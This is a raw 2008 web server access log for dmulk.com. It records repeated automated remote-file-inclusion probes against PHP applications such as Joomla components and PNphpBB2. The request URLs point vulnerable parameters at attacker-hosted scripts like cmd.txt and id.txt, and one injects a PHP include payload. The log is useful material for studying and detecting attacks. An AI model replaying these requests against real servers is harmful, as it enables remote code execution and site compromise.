66.225.229.167 - - [06/May/2008:09:13:06 -0700] "GET //encapscms_PATH/core/core.php?root=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.229.167 - - [06/May/2008:09:13:06 -0700] "GET /logs//encapscms_PATH/core/core.php?root=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.229.167 - - [06/May/2008:09:13:12 -0700] "GET /logs/access_080321.log//encapscms_PATH/core/core.php?root=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.173.48.114 - - [06/May/2008:09:13:31 -0700] "GET /index1.php?choix=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.195.169.18 - - [06/May/2008:09:14:28 -0700] "GET /logs/index1.php?choix=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.195.169.18 - - [06/May/2008:09:14:28 -0700] "GET /index1.php?choix=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:14:32 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:14:34 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:14:42 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:14:42 -0700] "GET //skin/zero_vote/error.php?dir=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:14:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:14:50 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:14:51 -0700] "GET //skin/zero_vote/error.php?dir=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:14:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.51.232.116 - - [06/May/2008:09:14:55 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.33.45 - - [06/May/2008:09:14:58 -0700] "GET /memberlist.php?s=http://www.rotary-canelli-nizza.org/r0x.id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.214.33.45 - - [06/May/2008:09:14:58 -0700] "GET /logs/memberlist.php?s=http://www.rotary-canelli-nizza.org/r0x.id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
88.43.136.217 - - [06/May/2008:09:14:59 -0700] "GET /logs/access_080215.log/index.php?x=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.111.4.18 - - [06/May/2008:09:15:03 -0700] "GET /logs/errors.php?error=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.111.4.18 - - [06/May/2008:09:15:03 -0700] "GET /errors.php?error=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.43.136.217 - - [06/May/2008:09:15:05 -0700] "GET /index.php?x=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
88.43.136.217 - - [06/May/2008:09:15:06 -0700] "GET /logs/index.php?x=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.23.154.168 - - [06/May/2008:09:15:18 -0700] "GET /logs/errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.154.168 - - [06/May/2008:09:15:19 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.129.6 - - [06/May/2008:09:15:22 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.free-auctions.net/uploaded/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.129.6 - - [06/May/2008:09:15:23 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.free-auctions.net/uploaded/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.129.6 - - [06/May/2008:09:15:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.free-auctions.net/uploaded/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:15:25 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [06/May/2008:09:15:26 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.9.129.6 - - [06/May/2008:09:15:30 -0700] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.free-auctions.net/uploaded/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
69.9.129.6 - - [06/May/2008:09:15:30 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.free-auctions.net/uploaded/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
69.9.129.6 - - [06/May/2008:09:15:31 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.free-auctions.net/uploaded/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
85.214.26.250 - - [06/May/2008:09:15:32 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
210.86.181.227 - - [06/May/2008:09:15:47 -0700] "GET /index1.php?choix=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.213.74.114 - - [06/May/2008:09:15:51 -0700] "GET /index1.php?choix=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:16:02 -0700] "GET /logs/access_080213.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:16:08 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:16:12 -0700] "GET /logs/access_080213.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:16:14 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:16:23 -0700] "GET //skin/zero_vote/error.php?dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:16:23 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:16:25 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:16:25 -0700] "GET //skin/zero_vote/error.php?dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:16:26 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.23.154.168 - - [06/May/2008:09:16:30 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:16:49 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:17:03 -0700] "GET //tools/send_reminders.php?includedir=http://www.freewebs.com/haddem/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:17:03 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.freewebs.com/haddem/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.173.48.114 - - [06/May/2008:09:17:22 -0700] "GET /logs/index1.php?choix=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [06/May/2008:09:17:27 -0700] "GET /index1.php?choix=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:18:01 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:18:02 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.212.173.42 - - [06/May/2008:09:18:02 -0700] "GET /logs/config.php?path_to_root=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [06/May/2008:09:18:02 -0700] "GET /config.php?path_to_root=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:09:18:22 -0700] "GET /oneadmin/common/include.php?path[docroot]=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:18:22 -0700] "GET /logs/access_080315.log//templates/mangobery/footer.sample.php?Site_Path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:18:22 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.195.169.18 - - [06/May/2008:09:18:23 -0700] "GET /index1.php?choix=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:18:27 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.81.233 - - [06/May/2008:09:18:50 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [06/May/2008:09:18:50 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
68.165.216.146 - - [06/May/2008:09:19:04 -0700] "GET /oneadmin/common/include.php?path[docroot]=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [06/May/2008:09:19:05 -0700] "GET /logs/oneadmin/common/include.php?path[docroot]=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:19:07 -0700] "GET /logs/access_080113.log//templates/mangobery/footer.sample.php?Site_Path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.115.49 - - [06/May/2008:09:19:18 -0700] "GET /logs/contenido.php?sec=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [06/May/2008:09:19:18 -0700] "GET /contenido.php?sec=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.242.220.51 - - [06/May/2008:09:19:40 -0700] "GET /logs/contenido.php?sec=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.220.51 - - [06/May/2008:09:19:40 -0700] "GET /contenido.php?sec=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:19:47 -0700] "GET /logs/access.log/index.php?option=com_mtree&task=listalpha&http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:19:47 -0700] "GET /logs/index.php?option=com_mtree&task=listalpha&http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.4.33 - - [06/May/2008:09:19:47 -0700] "GET /index1.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.111.4.18 - - [06/May/2008:09:19:48 -0700] "GET /logs/index1.php?choix=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.111.4.18 - - [06/May/2008:09:19:48 -0700] "GET /index1.php?choix=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.154.168 - - [06/May/2008:09:20:06 -0700] "GET /logs/index2.php?url_page=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.154.168 - - [06/May/2008:09:20:06 -0700] "GET /index2.php?url_page=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.114.10.247 - - [06/May/2008:09:20:15 -0700] "GET /logs/contenido.php?sec=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.114.10.247 - - [06/May/2008:09:20:16 -0700] "GET /contenido.php?sec=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.111.4.18 - - [06/May/2008:09:20:21 -0700] "GET /index1.php?choix=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.4.33 - - [06/May/2008:09:20:25 -0700] "GET /logs/contenido.php?sec=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [06/May/2008:09:20:26 -0700] "GET /contenido.php?sec=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.233 - - [06/May/2008:09:20:26 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:20:28 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:20:28 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:20:28 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:21:03 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:21:24 -0700] "GET /logs/bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:21:25 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:21:46 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:21:47 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:09:21:59 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:22:06 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:22:06 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.69" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:09:22:06 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:22:17 -0700] "GET /logs/ndex2.php?x=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:22:18 -0700] "GET /ndex2.php?x=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:22:29 -0700] "GET /logs/bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:22:29 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:09:22:39 -0700] "GET //index2.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:09:22:39 -0700] "GET /logs//index2.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
74.6.17.47 - - [06/May/2008:09:22:42 -0700] "GET /logs/access_070812.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.1.92.216 - - [06/May/2008:09:22:47 -0700] "GET /logs/access_080229.log//squirrelcart/cart_content.php?cart_isp_root=http://www.fileden.com/files/2008/2/21/1772944/codice.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.1.92.216 - - [06/May/2008:09:22:50 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.fileden.com/files/2008/2/21/1772944/codice.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.1.92.216 - - [06/May/2008:09:22:51 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.fileden.com/files/2008/2/21/1772944/codice.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:23:16 -0700] "GET /logs/access_080315.log/bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:23:16 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:23:16 -0700] "GET /logs/bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.249.117.66 - - [06/May/2008:09:23:18 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [06/May/2008:09:23:18 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:23:23 -0700] "GET /logs/access_080220.log/bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:23:40 -0700] "GET /logs/access_080213.log/bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:23:40 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:23:40 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [06/May/2008:09:23:41 -0700] "GET /logs/access_080324.log/bemarket/postscript/postscript.php?p_mode=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.96.74 - - [06/May/2008:09:23:44 -0700] "GET /logs/contenido.php?sec=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.96.74 - - [06/May/2008:09:23:44 -0700] "GET /contenido.php?sec=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.249.117.66 - - [06/May/2008:09:23:46 -0700] "GET /logs/bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.66 - - [06/May/2008:09:23:46 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:09:23:47 -0700] "GET /logs/access_080302.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
